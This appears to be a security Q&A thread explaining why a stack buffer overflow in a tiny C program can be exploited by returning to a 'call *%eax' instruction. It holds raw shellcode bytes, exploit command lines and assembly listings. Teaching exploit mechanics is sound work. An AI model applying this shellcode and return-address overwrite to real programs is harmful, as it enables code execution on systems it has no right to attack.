Explaining a buffer overflow vulnerability in C

Question

Given this C program:

#include <stdio.h>
#include <string.h>

int main(int argc, char **argv) {
  char buf[1024];
  strcpy(buf, argv[1]);
}

Built with:

gcc -m32 -z execstack prog.c -o prog

Given shell code:

EGG=$(printf '\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/df')

The program is exploitable with the commands:

./prog $EGG$(python -c 'print "A" * 991 + "\x87\x83\x04\x08"')
./prog $EGG$(python -c 'print "A" * 991 + "\x0f\x84\x04\x08"')

where I got the addresses from:

$ objdump -d prog | grep call.*eax
 8048387:   ff d0                   call   *%eax
 804840f:   ff d0                   call   *%eax

I understand the purpose of the AAAA padding in the middle; I calculated the 991 from the length of buf in the program and the length of $EGG.

What I don't understand is why either of these call *%eax addresses triggers execution of the shellcode copied to the beginning of buf. As far as I understand, I'm overwriting the return address with 0x8048387 (or the other one), but I don't see why that leads to a jump into the shellcode.

I got this far by reading Smashing the Stack for Fun and Profit. But that article uses a different approach: guessing a relative address to jump to the shellcode. I'm puzzled by why this simpler alternative works directly, without guesswork.

Keep in mind that you cannot say that your exploit **works**, as the reported behavior took place because of a programming error. You left the address returned by strcpy() *hanging in the vacuum* and that cannot be described as something a developer would do in his software. Copying a memory buffer to another address (*that gets lost!*) makes no sense if you don't use this new address for anything. — DarkLighting, Dec 29 '14 at 13:16

score 11 · Accepted Answer · answered Sep 28 '13 at 22:36

On 32-bit x86 processors, with the ELF format in use on Linux systems, the function call convention states (page 3-12) that:

A function that returns an integral or pointer value places its result in register %eax.

In your program, the last statement of main() is a call to strcpy(). That function returns its first argument, here a pointer to the buf[] array. So when the end of main() is reached, %eax still points to buf[]. The overwritten return address sends execution to a call *%eax instruction, and that call jumps to wherever %eax points: into the array which contains the shellcode.

If unsure, see the generated assembly code:

$ gcc -S -m32 -z execstack -fno-stack-protector prog.c
$ cat prog.s
    .file   "prog.c"
    .text
    .globl  main
    .type   main, @function
main:
.LFB0:
    .cfi_startproc
    pushl   %ebp
    .cfi_def_cfa_offset 8
    .cfi_offset 5, -8
    movl    %esp, %ebp
    .cfi_def_cfa_register 5
    andl    $-16, %esp
    subl    $1040, %esp
    movl    12(%ebp), %eax
    addl    $4, %eax
    movl    (%eax), %eax
    movl    %eax, 4(%esp)
    leal    16(%esp), %eax
    movl    %eax, (%esp)
    call    strcpy
    leave
    .cfi_restore 5
    .cfi_def_cfa 4, 4
    ret
    .cfi_endproc
.LFE0:
    .size   main, .-main
    .ident  "GCC: (Ubuntu/Linaro 4.6.3-1ubuntu5) 4.6.3"
    .section    .note.GNU-stack,"",@progbits

Look at the end: after the call strcpy, there is only a leave and then a ret, neither of which modifies %eax. So when the ret is reached, %eax still contains the value set by the strcpy() function, and that is a pointer to the buf[] array.

If you add a return 0; after the call to strcpy(), then the exploit no longer works: that return 0; sets %eax to 0 before returning, so the call *%eax jumps to address 0 and triggers a segmentation fault. In the assembly code generated by GCC, you would see an extra movl $0, %eax before the leave.
